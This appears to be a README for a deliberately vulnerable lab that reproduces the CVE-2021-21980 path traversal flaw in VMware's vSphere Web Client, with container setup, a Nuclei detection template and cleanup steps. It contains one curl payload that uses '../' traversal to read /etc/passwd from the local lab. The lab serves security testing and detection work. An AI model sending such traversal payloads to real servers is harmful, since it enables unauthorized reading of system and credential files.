Share
## https://sploitus.com/exploit?id=145A7CD4-B616-58BF-8A2F-1B0C004BF5D3
# CVE-2021-21980 Vulnerable Test Environment

## Overview
Realistic test environment simulating VMware vSphere Web Client path traversal vulnerability.

**โš ๏ธ WARNING:** Vulnerable test environment. Do NOT expose to internet!

## Quick Start

### Build and Run
```bash
podman build -t vcenter-lab .
podman run -d -p 443:443 --name vcenter-lab vcenter-lab
```

### Test Manually
```bash
curl -k "https://localhost/ui/vic-rest/services/containerView?id=../../../etc/passwd"
```

### Test with Nuclei
```bash
nuclei -t CVE-2021-21980.yaml -u https://localhost -debug
```

## What Makes This Different from Mock Servers

โœ… **Actually reads files** from container filesystem using Python file I/O  
โœ… **Realistic behavior** - Handles path traversal like real vSphere  
โœ… **VMware headers** - Includes `Server: VMware-HTTP-Server/1.0`  
โœ… **SSL/TLS** - Self-signed certificate generation  
โœ… **Not hardcoded** - Returns actual file contents  

## Vulnerability Details

- **CVE:** CVE-2021-21980
- **Severity:** High (CVSS 7.5)
- **Type:** Path Traversal / Arbitrary File Read
- **Affected:** VMware vCenter Server 7.0, 6.7, 6.5 (unpatched)

## Files

- `Dockerfile` - Container build configuration
- `server.py` - Vulnerable Flask application
- `CVE-2021-21980.yaml` - Nuclei detection template
- `README.md` - This file

## Validation Proof

This lab was validated with Nuclei showing:
- Successful detection of vulnerability
- Actual file reading (not mock responses)
- Complete HTTP request/response traces in debug mode

## Cleanup
```bash
podman stop vcenter-lab && podman rm vcenter-lab
```

## References
- https://www.vmware.com/security/advisories/VMSA-2021-0002.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-21980